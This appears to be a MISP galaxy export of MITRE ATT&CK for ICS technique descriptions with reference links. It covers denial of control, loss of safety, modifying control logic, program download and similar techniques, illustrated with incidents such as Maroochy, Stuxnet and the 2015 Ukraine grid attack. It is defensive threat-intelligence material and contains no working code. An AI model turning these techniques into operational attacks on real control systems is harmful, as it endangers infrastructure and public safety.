Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network preventing them from issuing any controls.

The tag is: *misp-galaxy:mitre-ics-techniques*="Denial of Control"

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Denial of Service

Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a or denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through Control Device Identification. There are examples of adversaries remotely causing a Device Restart/Shutdown by exploiting a vulnerability that induces uncontrolled resource consumption. In the Maroochy attack, the adversary was able to shut an investigator out of the network.

The tag is: mish-galaxy:mitre-ics-techniques="Denial of Service"

Table 4201. Table References

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Denial of View

Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment’s data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network.
Detected Operating Mode

Adversaries may gather information about the current operating state of a PLC. CPU operating modes are often controlled by a key switch on the PLC. Example states may be run, prog, stop, remote, and invalid. Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC.

The tag is: `misp-galaxy:mitre-ics-techniques="Detect Operating Mode"`

### Detect Program State

Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.

The tag is: `misp-galaxy:mitre-ics-techniques="Detect Program State"`
**Device Restart/Shutdown**

Adversaries may forcibly restart or shutdown a device in the ICS environment to disrupt and potentially cause adverse effects on the physical processes it helps to control. Methods of device restart and shutdown exist as built-in, standard functionalities. This can include interactive device web interfaces, CLIs, and network protocol commands, among others. Device restart or shutdown may also occur as a consequence of changing a device into an alternative mode of operation for testing or firmware loading. Unexpected restart or shutdown of control system devices may contribute to impact, by preventing expected response functions from activating and being received in critical states. This can also be a sign of malicious device modification, as many updates require a shutdown in order to take affect. For example, DNP3’s function code 0x0D can reset and reconfigure DNP3 outstations by forcing them to perform a complete power cycle. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries scheduled disconnects for the uninterruptable power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered.

The tag is: `misp-galaxy:mitre-ics-techniques="Device Restart/Shutdown"`

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**Drive-by Compromise**

Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.

The tag is: `misp-galaxy:mitre-ics-techniques="Drive-by Compromise"`

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**Table 4206. Table References**


Engineering Workstation Compromise

Adversaries may compromise and gain control of an engineering workstation as an Initial Access technique into the control system environment. Access to an engineering workstation may occur as a result of remote access or by physical means, such as a person with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to and control of other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

The tag is: misp-galaxy:mitre-ics-techniques="Engineering Workstation Compromise"

Execution through API

Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software, such as Change Program State of a program on a PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Execution through API"
Exploit Public-Facing Application

Adversaries may attempt to exploit public-facing applications to leverage weaknesses on Internet-facing computer systems, programs, or assets in order to cause unintended or unexpected behavior. These public-facing applications may include user interfaces, software, data, or commands. In particular, a public-facing application in the IT environment may provide adversaries an interface into the OT environment. ICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI with a direct connection to the Internet.

The tag is: misp-galaxy:mitre-ics-techniques="Exploit Public-Facing Application"

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Exploitation for Evasion

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through Control Device Identification about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious System Firmware.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation for Evasion"

Table 4210. Table References

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**Exploitation of Remote Services**

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (“wormable”) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts.

The tag is: *misp-galaxy:mitre-ics-techniques*="Exploitation of Remote Services"

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**External Remote Services**

Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. In the Maroochy Attack, the adversary was able to gain remote computer access to the system over radio. The 2015 attack on the Ukrainian power grid showed the use of existing remote access tools within the environment to access the control system network. The adversary harvested worker credentials, some of them for VPNs the grid workers used to remotely log into the control system networks.3245 The VPNs into these networks appear to have lacked two-factor authentication.

The tag is: *misp-galaxy:mitre-ics-techniques*="External Remote Services"

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Graphical User Interface

Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the 2015 attack on the Ukrainian power grid, the adversary utilized the GUI of HMIs in the SCADA environment to open breakers.

The tag is: `misp-galaxy:mitre-ics-techniques="Graphical User Interface"`

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Hooking

Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for persistent means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process’s IAT, where pointers to imported API functions are stored.
I/O Image

Adversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O.

I/O Module Discovery

Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.

Indicator Removal on Host

Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.
Internet Accessible Device

Adversaries may gain access into industrial environments directly through systems exposed to the internet for remote access rather than through External Remote Services. Minimal protections provided by these devices such as password authentication may be targeted and compromised. In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing.

Location Identification

Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries1. While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. An adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.
Loss of Availability

Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.

The tag is: `misp-galaxy:mitre-ics-techniques=“Loss of Availability"`

Loss of Control

Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided.

The tag is: `misp-galaxy:mitre-ics-techniques=“Loss of Control"`
Loss of Productivity and Revenue

Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In some cases, this may result from the postponement and disruption of ICS operations and production as part of a remediation effort. Operations may be brought to a halt and effectively stopped in an effort to contain and properly remove malware or due to the Loss of Safety.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Productivity and Revenue"

Table 4222. Table References

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<tr>
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<tr>
<td><a href="https://www.hydro.com/en/media/on-the-agenda/cyber-attack/">https://www.hydro.com/en/media/on-the-agenda/cyber-attack/</a></td>
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<tr>
<td><a href="https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war">https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war</a></td>
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Loss of Safety

Adversaries may cause loss of safety whether on purpose or as a consequence of actions taken to accomplish an operation. The loss of safety can describe a physical impact and threat, or the potential for unsafe conditions and activity in terms of control systems environments, devices, or processes. For instance, an adversary may issue commands or influence and possibly inhibit safety mechanisms that allow the injury of and possible loss of life. This can also encompass scenarios resulting in the failure of a safety mechanism or control, that may lead to unsafe and dangerous execution and outcomes of physical processes and related systems. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace. A Polish
student used a remote controller device to interface with the Lodz city tram system in Poland. Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact.

The tag is: **misp-galaxy:mitre-ics-techniques="Loss of Safety"**

**Table 4223. Table References**

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<td><a href="https://books.google.com/books?id=oXIYBAAAQBAJ&amp;pg=PA249&amp;lpg=PA249&amp;dq=loss+denial+manipulation+of+view&amp;source=bl&amp;ots=dV1uQ8lUff&amp;sig=ACfU3U2N1wGjhg051D_Ytw6npyEk9xcf4w&amp;hl=en&amp;sa=X&amp;ved=2ahUKEwj2wJ7y4tDIAhVmplkKHSTaDnQQ6AEwAHoECAAgQA#v=onepage&amp;q=loss%20denial%20manipulation%20view&amp;f=false">https://books.google.com/books?id=oXIYBAAAQBAJ&amp;pg=PA249&amp;lpg=PA249&amp;dq=loss+denial+manipulation+of+view&amp;source=bl&amp;ots=dV1uQ8lUff&amp;sig=ACfU3U2N1wGjhg051D_Ytw6npyEk9xcf4w&amp;hl=en&amp;sa=X&amp;ved=2ahUKEwj2wJ7y4tDIAhVmplkKHSTaDnQQ6AEwAHoECAAgQA#v=onepage&amp;q=loss%20denial%20manipulation%20view&amp;f=false</a></td>
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<td><a href="https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/">https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/</a></td>
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<td><a href="https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html">https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html</a></td>
</tr>
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**Loss of View**

Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves.

The tag is: **misp-galaxy:mitre-ics-techniques="Loss of View"**

**Table 4224. Table References**

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Man in the Middle

Adversaries with privileged network access may seek to modify network traffic in real time using man-in-the-middle (MITM) attacks. This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a MITM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. A MITM attack may allow an adversary to perform the following attacks: Block Reporting Message, Modify Parameter, Unauthorized Command Message, Spoof Reporting Message.

The tag is: misp-galaxy:mitre-ics-techniques="Man in the Middle"

Table 4225. Table References

Links


http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://dragos.com/resource/hexane/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Manipulate I/O Image

Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. During the PLC scan cycle, the state of the actual physical inputs is copied to a portion of the PLC memory, commonly called the input image table. When the program is scanned, it examines the input image table to read the state of a physical input. When the logic determines the state of a physical output, it writes to a portion of the PLC memory commonly called the output image table. The output image may also be examined during the program scan. To update the physical outputs, the output image table contents are copied to the physical outputs after the program is scanned.
One of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.

The tag is: misp-galaxy:mitre-ics-techniques="Manipulate I/O Image"

**Table 4226. Table References**

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**Manipulation of Control**

Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. Methods of Manipulation of Control include: Man-in-the-middle, Spoof command message, Changing setpoints

The tag is: misp-galaxy:mitre-ics-techniques="Manipulation of Control"

**Table 4227. Table References**

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<tr>
<td>Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.[Stuxnet can reprogram a PLC and change critical parameters in such a way that legitimate commands can be overridden or intercepted. In addition, Stuxnet can apply inappropriate command sequences or parameters to cause damage to property.]</td>
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**Masquerading**

Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions. Applications and other files commonly found on Windows systems or in engineering workstations have been impersonated before. This can be as simple as renaming a file to effectively disguise it in the ICS environment.

The tag is: misp-galaxy:mitre-ics-techniques="Masquerading"
Modify Alarm Settings

Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then an Impact could occur. In ICS environments, the adversary may have to use Alarm Suppression or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Alarm Settings"

Modify Control Logic

Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates. Program code is normally edited in a vendor-specific Integrated Development Environment (IDE) that relies on proprietary tools and features. These IDEs allow an engineer to perform host target development and may have the ability to run the code on the machine it is programmed for. The IDE will transmit the control logic to the testing device, and will perform the
required device-specific functions to apply the changes and make them active. An adversary may attempt to use this host target IDE to modify device control logic. Even though proprietary tools are often used to edit and update control logic, the process can usually be reverse-engineered and reproduced with open-source tools. An adversary can de-calibrate a sensor by removing functions in control logic that account for sensor error. This can be used to change a control process without actually spoofing command messages to a controller or device. It is believed this process happened in the lesser known over-pressurizer attacks build into Stuxnet. Pressure sensors are not perfect at translating pressure into an analog output signal, but their errors can be corrected by calibration. The pressure controller can be told what the “real” pressure is for given analog signals and then automatically linearize the measurement to what would be the “real” pressure. If the linearization is overwritten by malicious code on the S7-417 controller, analog pressure readings will be “corrected” during the attack by the pressure controller, which then interprets all analog pressure readings as perfectly normal pressure no matter how high or low their analog values are. The pressure controller then acts accordingly by never opening the stage exhaust valves. In the meantime, actual pressure keeps rising. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Control Logic"

Table 4230. Table References

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<td><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf</a></td>
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Modify Parameter

Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause Impact to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in
the laptop was one developed by Hunter Watertech for its use in changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.

The tag is: misp-galaxy:mitre-ics-techniques="Modify Parameter"

Table 4231. Table References

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<td><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf</a></td>
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Module Firmware

Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. This technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. An easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.

The tag is: misp-galaxy:mitre-ics-techniques="Module Firmware"

Table 4232. Table References

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<td><a href="https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices">https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices</a></td>
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<td><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf</a></td>
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Monitor Process State

Adversaries may gather information about the physical process state. This information may be used
to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.

The tag is: misp-galaxy:mitre-ics-techniques="Monitor Process State"

Table 4233. Table References

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<td><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf</a></td>
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**Network Connection Enumeration**

Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as netstat, in conjunction with System Firmware, then they can determine the role of certain devices on the network. The adversary can also use Network Sniffing to watch network traffic for details about the source, destination, protocol, and content.

The tag is: misp-galaxy:mitre-ics-techniques="Network Connection Enumeration"

Table 4234. Table References

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<td><a href="https://attack.mitre.org/wiki/Technique/T1049">https://attack.mitre.org/wiki/Technique/T1049</a></td>
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<td><a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf</a></td>
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**Network Service Scanning**

Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on specific port numbers, the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is Nmap. An adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to. Scanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.

The tag is: misp-galaxy:mitre-ics-techniques="Network Service Scanning"

Table 4235. Table References
Network Sniffing

Network sniffing is the practice of using a network interface on a computer system to monitor or capture information regardless of whether it is the specified destination for the information. An adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. Network sniffing can be a way to discover information for Control Device Identification. In addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

The tag is: misp-galaxy:mitre-ics-techniques="Network Sniffing"

Table 4236. Table References

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<td><a href="https://attack.mitre.org/wiki/Technique/T1040">https://attack.mitre.org/wiki/Technique/T1040</a></td>
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<td><a href="https://www.youtube.com/watch?v=yuZazP22rpI">https://www.youtube.com/watch?v=yuZazP22rpI</a></td>
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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Point & Tag Identification

Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. Tags are the identifiers given to points for operator convenience. Collecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.
Table 4237. Table References

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<tr>
<td>Backdoor.Oldrea enumerates all OPC tags and queries for specific fields such as server state, tag name, type, access, and id</td>
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**Program Download**

Adversaries may perform a program download to load malicious or unintended program logic on a device as a method of persistence or to disrupt response functions or process control. Program download onto devices, such as PLCs, allows adversaries to implement custom logic. Malicious PLC programs may be used to disrupt physical processes or enable adversary persistence. The act of a program download will cause the PLC to enter a STOP operation state, which may prevent response functions from operating correctly.

The tag is: *misp-galaxy:mitre-ics-techniques=*"Program Download"

Table 4238. Table References

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<tr>
<td><a href="https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware">https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware</a></td>
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**Program Organization Units**

Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. Stuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected: Increase the size of the original block. Write malicious code to the beginning of the block. Insert the original OB1 code after the malicious code.

The tag is: *misp-galaxy:mitre-ics-techniques=*"Program Organization Units"

Table 4239. Table References

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Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior.

Program Upload

Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.

The tag is: misp-galaxy:mitre-ics-techniques="Program Upload"

Project File Infection

Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further execution and persistence techniques. Adversaries may export their own code into project files with conditions to execute at specific intervals. Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.

The tag is: misp-galaxy:mitre-ics-techniques="Project File Infection"
Remote File Copy

Adversaries may copy files from one system to another to stage adversary tools or other files over the course of an operation. Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. In control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.

The tag is: misp-galaxy:mitre-ics-techniques="Remote File Copy"

Table 4242. Table References

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<tr>
<td>WannaCry can move laterally through industrial networks by means of the SMB service.</td>
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<td><a href="https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/">https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/</a></td>
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Remote System Discovery

Remote System Discovery is the process of identifying the presence of hosts on a network, and details about them. This process is common to network administrators validating the presence of machines and services, as well as adversaries mapping out a network for future-attack targets. An adversary may attempt to gain information about the target network via network enumeration techniques such as port scanning. One of the most popular tools for enumeration is Nmap. Remote System Discovery allows adversaries to map out hosts on the network as well as the TCP/IP ports that are open, closed, or filtered. Remote System Discovery tools also aid in by attempting to connect to the service and determine its exact version. The adversary may use this information to pick an exploit for a particular version if a known vulnerability exists.

The tag is: misp-galaxy:mitre-ics-techniques="Remote System Discovery"

Table 4243. Table References

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<td><a href="https://attack.mitre.org/wiki/Technique/T1018">https://attack.mitre.org/wiki/Technique/T1018</a></td>
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Replication Through Removable Media

Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. Operators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. The plant has since checked for infection and cleaned up more than 1,000 computers. An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution.

The tag is: misp-galaxy:mitre-ics-techniques="Replication Through Removable Media"

Table 4244. Table References

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<td><a href="https://www.kkw-gundremmingen.de/presse.php?id=571">https://www.kkw-gundremmingen.de/presse.php?id=571</a></td>
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<tr>
